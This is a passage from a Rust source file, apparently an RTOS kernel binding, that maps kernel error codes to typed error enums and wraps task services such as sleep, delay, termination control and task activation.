define_error_kind! {
    /// Error type for [`TaskRef::migrate`].
    pub enum MigrateError {
        #[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
        BadContext,
        #[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
        BadId,
        /// Bad parameter.
        ///
        /// - The task is a restricted task, for which migration is
        /// not supported (`E_NOSPT`, NGKI1186).
        ///
        /// - The class the task belongs to does not permit assigning tasks to
        /// the specified processor (`E_PAR`, NGKI1160).
        ///
        /// - The task is assigned to a processor that is different from the
        /// calling processor (`E_OBJ`, NGKI1157).
        ///
        #[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
        BadParam,
        #[cfg(any())]
        AccessDenied,
    }
}
#[cfg(any(feature = "none", feature = "fmp3", feature = "solid_fmp3"))]
impl ErrorKind for MigrateError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            // Three distinct raw codes are all coalesced into `BadParam`
            #[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
            abi::E_PAR | abi::E_NOSPT | abi::E_OBJ => {
                Some(Self::BadParam(Kind::from_error_code(code)))
            }
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`TaskRef::delete`].
    #[cfg(feature = "dcre")]
    #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
    pub enum DeleteError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        #[cfg(any())]
        AccessDenied,
        #[cfg(not(feature = "none"))]
        BadState,
    }
}
#[cfg(feature = "dcre")]
impl ErrorKind for DeleteError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`TaskRef::state`].
    pub enum StateError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        #[cfg(any())]
        AccessDenied,
    }
}
impl ErrorKind for StateError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            // `E_MACV` is considered critical, hence excluded
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`TaskRef::info`].
    pub enum InfoError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        #[cfg(any())]
        AccessDenied,
    }
}
impl ErrorKind for InfoError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            // `E_MACV` is considered critical, hence excluded
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`TaskRef::wake`].
    pub enum WakeError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        #[cfg(any())]
        AccessDenied,
        /// Bad state.
        ///
        /// - The task is dormant.
        ///
        #[cfg(not(feature = "none"))]
        BadState,
        #[cfg(not(feature = "none"))]
        QueueOverflow,
    }
}
impl ErrorKind for WakeError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_QOVR => Some(Self::QueueOverflow(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`TaskRef::cancel_wake_all`].
    pub enum CancelWakeAllError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        #[cfg(any())]
        AccessDenied,
        /// Bad state.
        ///
        /// - The task is dormant.
        ///
        #[cfg(not(feature = "none"))]
        BadState,
    }
}
impl ErrorKind for CancelWakeAllError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`TaskRef::release_wait`].
    pub enum ReleaseWaitError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        #[cfg(any())]
        AccessDenied,
        /// Bad state.
        ///
        /// - The task is not waiting.
        ///
        #[cfg(not(feature = "none"))]
        BadState,
    }
}
impl ErrorKind for ReleaseWaitError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`TaskRef::suspend`].
    pub enum SuspendError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        #[cfg(any())]
        AccessDenied,
        /// Bad state.
        ///
        /// - The task is dormant.
        /// - The task has a pending termination request.
        ///
        #[cfg(not(feature = "none"))]
        BadState,
        /// The task is already suspended.
        #[cfg(not(feature = "none"))]
        QueueOverflow,
    }
}
impl ErrorKind for SuspendError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            // `E_RASTER` (pending termination request) is folded into `BadState`
            #[cfg(not(feature = "none"))]
            abi::E_OBJ | abi::E_RASTER => Some(Self::BadState(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_QOVR => Some(Self::QueueOverflow(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`TaskRef::resume`].
    pub enum ResumeError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        #[cfg(any())]
        AccessDenied,
        /// Bad state.
        ///
        /// - The task is not suspended.
        ///
        #[cfg(not(feature = "none"))]
        BadState,
    }
}
impl ErrorKind for ResumeError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`TaskRef::terminate`].
    pub enum TerminateError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        #[cfg(any())]
        AccessDenied,
        /// Bad state.
        ///
        /// - The task is dormant.
        /// - The task is assigned to a processor that is different from the
        /// current one (`E_OBJ`, NGKI3481).
        ///
        #[cfg(not(feature = "none"))]
        BadState,
        /// Bad parameter.
        ///
        /// - The current task cannot be terminated.
        ///
        #[cfg(not(feature = "none"))]
        BadParam,
    }
}
impl ErrorKind for TerminateError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ILUSE => Some(Self::BadParam(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`TaskRef::raise_termination`].
    pub enum RaiseTerminationError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        #[cfg(any())]
        AccessDenied,
        /// Bad state.
        ///
        /// - The task is dormant.
        /// - The task is assigned to a processor that is different from the
        /// current one (`E_OBJ`, NGKI3481).
        ///
        #[cfg(not(feature = "none"))]
        BadState,
        /// Bad parameter.
        ///
        /// - The current task cannot be terminated.
        ///
        #[cfg(not(feature = "none"))]
        BadParam,
    }
}
impl ErrorKind for RaiseTerminationError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ILUSE => Some(Self::BadParam(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`sleep`].
    pub enum SleepError {
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        #[cfg(not(feature = "none"))]
        Released,
        #[cfg(not(feature = "none"))]
        TerminateRequest,
    }
}
impl ErrorKind for SleepError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`sleep_timeout`].
    pub enum SleepTimeoutError {
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        #[cfg(not(feature = "none"))]
        Timeout,
        #[cfg(not(feature = "none"))]
        Released,
        #[cfg(not(feature = "none"))]
        TerminateRequest,
    }
}
impl ErrorKind for SleepTimeoutError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            // E_PAR is considered critical, hence excluded
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`delay`].
    pub enum DelayError {
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        #[cfg(not(feature = "none"))]
        Released,
        #[cfg(not(feature = "none"))]
        TerminateRequest,
    }
}
impl ErrorKind for DelayError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            // E_PAR is considered critical, hence excluded
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`exit`].
    pub enum ExitError {
        #[cfg(not(feature = "none"))]
        BadContext,
    }
}
impl ErrorKind for ExitError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            // E_SYS is considered critical, hence excluded
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`disable_termination`].
    pub enum DisableTerminationError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(any())]
        AccessDenied,
    }
}
impl ErrorKind for DisableTerminationError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
/// Error type for [`enable_termination`].
///
/// Shares its variants with [`DisableTerminationError`]; both service
/// calls can fail in the same ways.
pub type EnableTerminationError = DisableTerminationError;
/// The error type returned by [`current`] when the CPU lock state is active,
/// or the current thread is not in a task context.
///
/// Zero-sized: the error condition itself is the only information carried.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
pub struct BadContextError(());
define_error_kind! {
    /// Error type for [`current_id`].
    pub enum CurrentIdError {
        /// The CPU lock state is active.
        #[cfg(not(feature = "none"))]
        BadContext,
    }
}
impl ErrorKind for CurrentIdError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`Task::build`].
    #[cfg(feature = "dcre")]
    #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
    pub enum BuildError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(any())]
        AccessDenied,
        /// Ran out of memory or task IDs.
        #[cfg(not(feature = "none"))]
        OutOfMemory,
        /// Bad parameter.
        ///
        /// - The specified stack region overlaps with an existing memory
        /// object (NGKI1060, `E_OBJ`).
        ///
        /// - The specified system stack region is not included in a kernel-only
        /// memory object (NGKI1057, `E_OBJ`).
        ///
        /// - The specified stack size is too small (NGKI1042, `E_PAR`).
        ///
        /// - The specified system stack size is too small (NGKI1044, `E_PAR`).
        ///
        /// - NGKI5108, `E_PAR`.
        ///
        /// - The kernel configuration requires manual stack specification, but
        /// the caller did not specify one (NGKI3907, `E_PAR`).
        ///
        /// - The specified stack does not meet target-specific requirements
        /// (NGKI1056, `E_PAR`).
        ///
        /// - The specified system stack does not meet target-specific
        /// requirements (NGKI1065, `E_PAR`).
        ///
        /// - The caller requested to create a system task, and `sstk` is
        /// non-null (NGKI1068, `E_PAR`).
        ///
        /// - The caller requested to create a system task, `sstksz != 0`,
        /// and `stk` is non-null (NGKI1071, `E_PAR`).
        ///
        #[cfg(not(feature = "none"))]
        BadParam,
    }
}
#[cfg(feature = "dcre")]
impl ErrorKind for BuildError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        // `Builder::build` uses `get_pid` to get the current processor and
        // coalesces its error code into this error kind type. Thus, this error
        // kind type must be able to handle errors from both `acre_tsk` and
        // `get_pid`!
        match code.get() {
            // `E_MACV` is considered critical, hence excluded
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_NOID | abi::E_NOMEM => Some(Self::OutOfMemory(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_PAR => Some(Self::BadParam(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OBJ => Some(Self::BadParam(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
/// Task priority value.
///
/// An alias of the kernel's raw `PRI` type.
pub type Priority = abi::PRI;
/// Task state returned by [`TaskRef::state`].
///
/// Each discriminant mirrors the kernel's corresponding `TTS_*` constant
/// so the raw value can be converted by a plain transmute.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
#[repr(u8)]
pub enum State {
    Running = abi::TTS_RUN as u8,
    Ready = abi::TTS_RDY as u8,
    Waiting = abi::TTS_WAI as u8,
    Suspended = abi::TTS_SUS as u8,
    WaitingSuspended = abi::TTS_WAS as u8,
    Dormant = abi::TTS_DMT as u8,
}
impl State {
    // Safety: `x` (truncated to `u8`) must equal one of the `TTS_*`
    // discriminants above; any other value is undefined behavior.
    #[inline]
    unsafe fn from_abi_unchecked(x: abi::STAT) -> Self {
        unsafe { core::mem::transmute(x as u8) }
    }
}
/// Task information returned by [`TaskRef::info`].
///
/// A thin wrapper around the kernel's `T_RTSK` structure filled in by
/// `ref_tsk`.
#[derive(Debug, Clone, Copy)]
pub struct Info {
    // Raw kernel task-state block; absent when no kernel backend is selected
    #[cfg(not(feature = "none"))]
    raw: abi::T_RTSK,
}
impl Info {
    /// Get the task's state.
    #[inline]
    pub fn state(&self) -> State {
        match () {
            #[cfg(not(feature = "none"))]
            // Safety: relies on the kernel reporting only valid `TTS_*` values
            () => unsafe { State::from_abi_unchecked(self.raw.tskstat) },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// Get the task's current priority.
    #[inline]
    pub fn current_priority(&self) -> Priority {
        match () {
            #[cfg(not(feature = "none"))]
            () => self.raw.tskpri,
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// Get the task's base priority.
    #[inline]
    pub fn base_priority(&self) -> Priority {
        match () {
            #[cfg(not(feature = "none"))]
            () => self.raw.tskbpri,
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    // TODO: tskwait
    // TODO: wobjid
    // TODO: lefttmo
    // TODO: actcnt
    // TODO: wupcnt
    // TODO: raster
    // TODO: dister
    // TODO: prcid
    // TODO: actprc
}
/// `slp_tsk`: Put the current task to sleep.
///
/// The [`TaskRef::wake`] method and this function are semantically analogous to
/// `std::thread::Thread::unpark` and `std::thread::park`, respectively.
#[inline]
#[doc(alias = "slp_tsk")]
#[doc(alias = "park")]
pub fn sleep() -> Result<(), Error<SleepError>> {
    // `match ()` dispatches on the selected kernel backend at compile time.
    match () {
        #[cfg(not(feature = "none"))]
        () => unsafe {
            Error::err_if_negative(abi::slp_tsk())?;
            Ok(())
        },
        #[cfg(feature = "none")]
        () => unimplemented!(),
    }
}
/// `tslp_tsk`: Put the current task to sleep with timeout.
#[inline]
#[doc(alias = "tslp_tsk")]
#[doc(alias = "park_timeout")]
pub fn sleep_timeout(tmo: Timeout) -> Result<(), Error<SleepTimeoutError>> {
    match () {
        #[cfg(not(feature = "none"))]
        () => unsafe {
            Error::err_if_negative(abi::tslp_tsk(tmo.as_raw()))?;
            Ok(())
        },
        #[cfg(feature = "none")]
        () => unimplemented!(),
    }
}
/// `dly_tsk`: Delay the current task.
///
/// Unlike [`sleep_timeout`], the wait always lasts for the full `dur`
/// unless the wait is forcibly released or a termination is requested.
#[inline]
#[doc(alias = "dly_tsk")]
pub fn delay(dur: Duration) -> Result<(), Error<DelayError>> {
    match () {
        #[cfg(not(feature = "none"))]
        () => unsafe {
            Error::err_if_negative(abi::dly_tsk(dur.as_raw()))?;
            Ok(())
        },
        #[cfg(feature = "none")]
        () => unimplemented!(),
    }
}
/// `ext_tsk`: Terminate the current task.
///
/// This function will not return if it succeeds; it therefore returns the
/// `Error` directly rather than a `Result`.
///
/// # Safety
///
/// If the task's stack is reused later, stored local variables are
/// destroyed without running their destructors, violating the [pinning]
/// requirements.
///
/// [pinning]: core::pin
#[inline]
#[doc(alias = "ext_tsk")]
pub unsafe fn exit() -> Error<ExitError> {
    match () {
        #[cfg(not(feature = "none"))]
        // Only reached on failure, so the return code is always an error
        () => unsafe { Error::new_unchecked(ErrorCode::new_unchecked(abi::ext_tsk())) },
        #[cfg(feature = "none")]
        () => unimplemented!(),
    }
}
/// `dis_ter`: Disable the termination of the current task by
/// [a termination request].
///
/// [a termination request]: TaskRef::raise_termination
#[inline]
#[doc(alias = "dis_ter")]
pub fn disable_termination() -> Result<(), Error<DisableTerminationError>> {
    match () {
        #[cfg(not(feature = "none"))]
        () => unsafe {
            Error::err_if_negative(abi::dis_ter())?;
            Ok(())
        },
        #[cfg(feature = "none")]
        () => unimplemented!(),
    }
}
/// `ena_ter`: Re-enable the termination of the current task by
/// [a termination request].
///
/// Counterpart of [`disable_termination`].
///
/// [a termination request]: TaskRef::raise_termination
#[inline]
#[doc(alias = "ena_ter")]
pub fn enable_termination() -> Result<(), Error<EnableTerminationError>> {
    match () {
        #[cfg(not(feature = "none"))]
        () => unsafe {
            Error::err_if_negative(abi::ena_ter())?;
            Ok(())
        },
        #[cfg(feature = "none")]
        () => unimplemented!(),
    }
}
/// `sns_ter`: Determine if the termination by [a termination request] is
/// disabled for the current task.
///
/// [a termination request]: TaskRef::raise_termination
#[inline]
#[doc(alias = "sns_ter")]
pub fn is_termination_disabled() -> bool {
    match () {
        #[cfg(not(feature = "none"))]
        // `sns_ter` returns a boolean-like integer; nonzero means disabled
        () => unsafe { abi::sns_ter() != 0 },
        #[cfg(feature = "none")]
        () => unimplemented!(),
    }
}
/// `get_tid`: Get the currently running task's ID.
///
/// Returns `Ok(None)` when the kernel reports a raw ID of zero
/// (`NonNullID::new` yields `None` for zero) — presumably when there is no
/// current task; confirm against the kernel's `get_tid` specification.
#[inline]
#[doc(alias = "get_tid")]
pub fn current_id() -> Result<Option<abi::NonNullID>, Error<CurrentIdError>> {
    match () {
        #[cfg(not(feature = "none"))]
        () => unsafe {
            // `get_tid` writes the ID through an out-parameter
            let mut out = MaybeUninit::uninit();
            Error::err_if_negative(abi::get_tid(out.as_mut_ptr()))?;
            Ok(abi::NonNullID::new(out.assume_init()))
        },
        #[cfg(feature = "none")]
        () => unimplemented!(),
    }
}
/// A borrowed reference to a task.
///
/// Wraps a non-null task ID; the lifetime parameter ties the reference to
/// whatever owns the task object.
#[derive(PartialEq, Eq, Clone, Copy)]
pub struct TaskRef<'a> {
    id: abi::NonNullID,
    _phantom: PhantomData<&'a ()>,
}
impl fmt::Debug for TaskRef<'_> {
    // Renders as `Task(<id>)`, using the ID's `Display` formatting
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        write!(f, "Task({})", self.id)
    }
}
/// # Object ID conversion
impl TaskRef<'_> {
    /// Construct a `TaskRef` from a raw object ID.
    ///
    /// # Safety
    ///
    /// See [Object ID Wrappers](crate#object-id-wrappers).
    #[inline]
    pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
        Self {
            id,
            _phantom: PhantomData,
        }
    }
    /// Get the raw object ID.
    #[inline]
    pub const fn as_raw(self) -> abi::ID {
        self.id.get()
    }
    /// Get the raw object ID as [`abi::NonNullID`].
    #[inline]
    pub const fn as_raw_nonnull(self) -> abi::NonNullID {
        self.id
    }
}
/// # Management
impl TaskRef<'_> {
    /// `act_tsk`: Pend an activation request for the task.
    #[inline]
    #[doc(alias = "act_tsk")]
    pub fn activate(self) -> Result<(), Error<ActivateError>> {
        // `match ()` dispatches on the selected kernel backend at compile time.
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::act_tsk(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `mact_tsk`: Pend an activation request for the task, assigning it to
    /// the specified processor.
    ///
    /// On uniprocessor kernels this falls back to [`TaskRef::activate`].
    #[inline]
    #[doc(alias = "mact_tsk")]
    pub fn activate_on(self, processor: Processor) -> Result<(), Error<ActivateOnError>> {
        match () {
            #[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
            () => unsafe {
                Error::err_if_negative(abi::mact_tsk(self.as_raw(), processor.as_raw()))?;
                Ok(())
            },
            #[cfg(not(any(feature = "none", feature = "fmp3", feature = "solid_fmp3")))]
            () => {
                // On a uniprocessor kernel the only target is `UNIPROCESSOR`
                // (the irrefutable `let` pattern documents this), and the
                // `ActivateError` is re-wrapped as an `ActivateOnError`.
                let Processor::UNIPROCESSOR = processor;
                self.activate()
                    .map_err(|e| unsafe { Error::new_unchecked(e.code()) })
            }
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
/// `can_act`: Cancel any pending activation requests for the task.
/// Returns the number of cancelled requests.
#[inline]
#[doc(alias = "can_act")]
pub fn cancel_activate_all(self) -> Result<usize, Error<CancelActivateAllError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let count = Error::err_if_negative(abi::can_act(self.as_raw()))?;
Ok(count as usize)
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `chg_pri`: Change the task's base priority.
#[inline]
#[doc(alias = "chg_pri")]
pub fn set_base_priority(
self,
new_priority: Priority,
) -> Result<(), Error<SetBasePriorityError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::chg_pri(self.as_raw(), new_priority))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `get_pri`: Get the task's priority.
///
/// Use [`TaskRef::info`][] and [`Info::base_priority`][] to get the base
/// priority.
#[inline]
